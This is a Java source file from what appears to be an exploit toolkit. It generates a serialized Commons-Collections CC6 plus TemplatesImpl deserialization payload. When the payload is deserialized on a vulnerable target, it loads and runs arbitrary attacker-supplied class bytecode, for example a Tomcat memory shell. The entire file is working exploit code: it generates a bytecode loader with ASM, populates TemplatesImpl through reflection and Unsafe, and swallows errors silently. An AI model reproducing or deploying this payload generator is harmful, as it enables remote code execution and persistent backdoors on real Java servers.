package com.oobx.chains;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.objectweb.asm.*;
import org.springframework.stereotype.Component;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

/**
 * Builds a CC6 + TemplatesImpl serialized payload that loads arbitrary class
 * bytecode when deserialized on a target with commons-collections 3.x.
 *
 * Accepts chain IDs: serialize_bytecode_cc6
 *
 * Required param:
 *   bytecode_b64 — Base64-encoded class bytes of the class to load on
 *                  the target (e.g. a Tomcat memshell).
 *
 * The payload uses TemplatesImpl to carry the target class bytes; the CC6
 * gadget chain triggers TemplatesImpl.newTransformer() → defineClass+newInstance
 * on the supplied bytecode.
 */
@Component
public class BytecodeSerializeHandler implements ChainHandler {

    private static final String CHAIN_ID = "serialize_bytecode_cc6";

    @Override
    public PayloadResult generate(String chainId, Map<String, Object> params) throws Exception {
        String b64 = (String) params.getOrDefault("bytecode_b64", "");
        if (b64.isEmpty()) {
            return new PayloadResult("application/octet-stream", new byte[0],
                    Map.of("error", "bytecode_b64 required for " + CHAIN_ID));
        }

        byte[] targetBytes = Base64.getDecoder().decode(b64);

        // Step 1: build an AbstractTranslet-compatible loader class that carries targetBytes
        byte[] loaderBytes = buildLoaderClass(targetBytes);

        // Step 2: embed loaderBytes inside a TemplatesImpl object via reflection
        Object templates = buildTemplatesImpl(loaderBytes);

        // Step 3: wrap TemplatesImpl in a CC6 gadget chain and serialize
        byte[] payload = buildCC6Payload(templates);

        if (payload.length < 2 || payload[0] != (byte) 0xAC || payload[1] != (byte) 0xED) {
            return new PayloadResult("application/octet-stream", new byte[0],
                    Map.of("error", "Serialization produced invalid magic bytes"));
        }

        return new PayloadResult("application/octet-stream", payload,
                Map.of("chain", CHAIN_ID, "size", payload.length,
                        "target_class_size", targetBytes.length));
    }

    // ──────────────────────────────────────────────────────────────────────────
    // Step 1 — Build an AbstractTranslet wrapper using ASM (avoids Javassist
    //           type-resolution issues with internal java.xml module types).
    //           The wrapper embeds targetBytes as a Base64 constant string,
    //           decodes it in a static initializer, and defineClass+newInstance.
    // ──────────────────────────────────────────────────────────────────────────

    private byte[] buildLoaderClass(byte[] targetBytes) {
        String loaderName = "oobx/TemplatesLoader" + Integer.toHexString(System.identityHashCode(targetBytes));
        String b64Encoded = Base64.getEncoder().encodeToString(targetBytes);

        // Internal type name strings (never need to be loaded by the sidecar JVM,
        // only referenced as string constants in the generated bytecode)
        final String ABSTRACT_TRANSLET =
                "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet";
        final String TRANSLET_EXCEPTION =
                "com/sun/org/apache/xalan/internal/xsltc/TransletException";
        final String DOM_DESC =
                "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;";
        final String DTM_ITER_DESC =
                "Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;";
        final String SER_HANDLER_DESC =
                "Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;";

        ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS);
        cw.visit(Opcodes.V1_8, Opcodes.ACC_PUBLIC | Opcodes.ACC_SUPER,
                loaderName, null, ABSTRACT_TRANSLET, null);

        // ── Default constructor ────────────────────────────────────────────────
        {
            MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PUBLIC, "<init>", "()V", null, null);
            mv.visitCode();
            mv.visitVarInsn(Opcodes.ALOAD, 0);
            mv.visitMethodInsn(Opcodes.INVOKESPECIAL, ABSTRACT_TRANSLET, "<init>", "()V", false);
            mv.visitInsn(Opcodes.RETURN);
            mv.visitMaxs(1, 1);
            mv.visitEnd();
        }

        // ── Abstract transform stub (required by AbstractTranslet in Java 17) ──
        {
            MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PUBLIC, "transform",
                    "(" + DOM_DESC + DTM_ITER_DESC + SER_HANDLER_DESC + ")V",
                    null, new String[]{TRANSLET_EXCEPTION});
            mv.visitCode();
            mv.visitInsn(Opcodes.RETURN);
            mv.visitMaxs(0, 4);
            mv.visitEnd();
        }

        // ── Static initializer ─────────────────────────────────────────────────
        // Equivalent Java:
        //   static {
        //     try {
        //       byte[] b = Base64.getDecoder().decode(B64);
        //       ClassLoader cl = Thread.currentThread().getContextClassLoader();
        //       Method define = ClassLoader.class.getDeclaredMethod("defineClass",
        //           new Class[]{String.class, byte[].class, int.class, int.class});
        //       define.setAccessible(true);
        //       Class c = (Class) define.invoke(cl,
        //           new Object[]{null, b, Integer.valueOf(0), Integer.valueOf(b.length)});
        //       c.newInstance();
        //     } catch (Throwable t) {}
        //   }
        {
            MethodVisitor mv = cw.visitMethod(Opcodes.ACC_STATIC, "<clinit>", "()V", null, null);
            mv.visitCode();

            Label tryStart   = new Label();
            Label tryEnd     = new Label();
            Label catchBlock = new Label();
            Label afterAll   = new Label();
            mv.visitTryCatchBlock(tryStart, tryEnd, catchBlock, "java/lang/Throwable");

            mv.visitLabel(tryStart);

            // byte[] b = Base64.getDecoder().decode(B64_STRING)
            mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/util/Base64",
                    "getDecoder", "()Ljava/util/Base64$Decoder;", false);
            mv.visitLdcInsn(b64Encoded);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/util/Base64$Decoder",
                    "decode", "(Ljava/lang/String;)[B", false);
            mv.visitVarInsn(Opcodes.ASTORE, 0); // local 0 = byte[] b

            // ClassLoader cl = Thread.currentThread().getContextClassLoader()
            mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/lang/Thread",
                    "currentThread", "()Ljava/lang/Thread;", false);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Thread",
                    "getContextClassLoader", "()Ljava/lang/ClassLoader;", false);
            mv.visitVarInsn(Opcodes.ASTORE, 1); // local 1 = ClassLoader cl

            // Method define = ClassLoader.class.getDeclaredMethod("defineClass",
            //     new Class[]{String.class, byte[].class, Integer.TYPE, Integer.TYPE})
            mv.visitLdcInsn(Type.getType(ClassLoader.class));
            mv.visitLdcInsn("defineClass");
            mv.visitInsn(Opcodes.ICONST_4);
            mv.visitTypeInsn(Opcodes.ANEWARRAY, "java/lang/Class");
            // [0] = String.class
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_0);
            mv.visitLdcInsn(Type.getType(String.class));
            mv.visitInsn(Opcodes.AASTORE);
            // [1] = byte[].class
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_1);
            mv.visitLdcInsn(Type.getType(byte[].class));
            mv.visitInsn(Opcodes.AASTORE);
            // [2] = Integer.TYPE (i.e. int.class)
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_2);
            mv.visitFieldInsn(Opcodes.GETSTATIC, "java/lang/Integer", "TYPE", "Ljava/lang/Class;");
            mv.visitInsn(Opcodes.AASTORE);
            // [3] = Integer.TYPE
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_3);
            mv.visitFieldInsn(Opcodes.GETSTATIC, "java/lang/Integer", "TYPE", "Ljava/lang/Class;");
            mv.visitInsn(Opcodes.AASTORE);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Class",
                    "getDeclaredMethod",
                    "(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;", false);
            mv.visitVarInsn(Opcodes.ASTORE, 2); // local 2 = Method define

            // define.setAccessible(true)
            mv.visitVarInsn(Opcodes.ALOAD, 2);
            mv.visitInsn(Opcodes.ICONST_1);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/reflect/Method",
                    "setAccessible", "(Z)V", false);

            // Class c = (Class) define.invoke(cl, new Object[]{null, b, 0, b.length})
            mv.visitVarInsn(Opcodes.ALOAD, 2);
            mv.visitVarInsn(Opcodes.ALOAD, 1);
            mv.visitInsn(Opcodes.ICONST_4);
            mv.visitTypeInsn(Opcodes.ANEWARRAY, "java/lang/Object");
            // [0] = null
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_0);
            mv.visitInsn(Opcodes.ACONST_NULL);
            mv.visitInsn(Opcodes.AASTORE);
            // [1] = b
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_1);
            mv.visitVarInsn(Opcodes.ALOAD, 0);
            mv.visitInsn(Opcodes.AASTORE);
            // [2] = Integer.valueOf(0)
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_2);
            mv.visitInsn(Opcodes.ICONST_0);
            mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/lang/Integer",
                    "valueOf", "(I)Ljava/lang/Integer;", false);
            mv.visitInsn(Opcodes.AASTORE);
            // [3] = Integer.valueOf(b.length)
            mv.visitInsn(Opcodes.DUP);
            mv.visitInsn(Opcodes.ICONST_3);
            mv.visitVarInsn(Opcodes.ALOAD, 0);
            mv.visitInsn(Opcodes.ARRAYLENGTH);
            mv.visitMethodInsn(Opcodes.INVOKESTATIC, "java/lang/Integer",
                    "valueOf", "(I)Ljava/lang/Integer;", false);
            mv.visitInsn(Opcodes.AASTORE);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/reflect/Method",
                    "invoke",
                    "(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;", false);
            mv.visitTypeInsn(Opcodes.CHECKCAST, "java/lang/Class");
            mv.visitVarInsn(Opcodes.ASTORE, 3); // local 3 = Class c

            // c.newInstance()
            mv.visitVarInsn(Opcodes.ALOAD, 3);
            mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/Class",
                    "newInstance", "()Ljava/lang/Object;", false);
            mv.visitInsn(Opcodes.POP);

            mv.visitLabel(tryEnd);
            mv.visitJumpInsn(Opcodes.GOTO, afterAll);

            // catch (Throwable t) { /* swallow */ }
            mv.visitLabel(catchBlock);
            mv.visitInsn(Opcodes.POP);

            mv.visitLabel(afterAll);
            mv.visitInsn(Opcodes.RETURN);
            mv.visitMaxs(0, 0);
            mv.visitEnd();
        }

        cw.visitEnd();
        return cw.toByteArray();
    }

    // ──────────────────────────────────────────────────────────────────────────
    // Step 2 — Populate a TemplatesImpl object via reflection
    // ──────────────────────────────────────────────────────────────────────────

    private Object buildTemplatesImpl(byte[] loaderBytes) throws Exception {
        Class<?> templatesClass = Class.forName(
                "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Object templates = unsafeAllocate(templatesClass);

        setField(templates, "_bytecodes", new byte[][]{loaderBytes});
        setField(templates, "_name", "oobxLoader");

        try {
            Class<?> tfClass = Class.forName(
                    "com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl");
            setField(templates, "_tfactory", tfClass.getDeclaredConstructor().newInstance());
        } catch (Exception ignored) {
        }

        return templates;
    }

    // ──────────────────────────────────────────────────────────────────────────
    // Step 3 — Build CC6 gadget chain and serialize
    // ──────────────────────────────────────────────────────────────────────────

    private byte[] buildCC6Payload(Object templates) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer", null, null)
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);

        Transformer fakeChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)});
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, fakeChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        HashSet set = new HashSet(1);
        set.add("foo");

        Field f = HashSet.class.getDeclaredField("map");
        f.setAccessible(true);
        HashMap innermostMap = (HashMap) f.get(set);

        Field f2 = HashMap.class.getDeclaredField("table");
        f2.setAccessible(true);
        Object[] table = (Object[]) f2.get(innermostMap);

        Object node = null;
        for (Object o : table) {
            if (o != null) { node = o; break; }
        }
        if (node == null) {
            throw new IllegalStateException("HashSet internal table is empty");
        }

        Field keyField = node.getClass().getDeclaredField("key");
        keyField.setAccessible(true);
        keyField.set(node, entry);

        Field factoryField = LazyMap.class.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap, chain);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(set);
        oos.close();
        return bos.toByteArray();
    }

    // ── Helpers ───────────────────────────────────────────────────────────────

    private static void setField(Object target, String name, Object value) throws Exception {
        Class<?> cls = target.getClass();
        while (cls != null) {
            try {
                Field f = cls.getDeclaredField(name);
                f.setAccessible(true);
                f.set(target, value);
                return;
            } catch (NoSuchFieldException e) {
                cls = cls.getSuperclass();
            }
        }
        throw new NoSuchFieldException("Field '" + name + "' not found in " + target.getClass());
    }

    @SuppressWarnings("unchecked")
    private static <T> T unsafeAllocate(Class<T> cls) throws Exception {
        Field f = sun.misc.Unsafe.class.getDeclaredField("theUnsafe");
        f.setAccessible(true);
        sun.misc.Unsafe unsafe = (sun.misc.Unsafe) f.get(null);
        return (T) unsafe.allocateInstance(cls);
    }
}
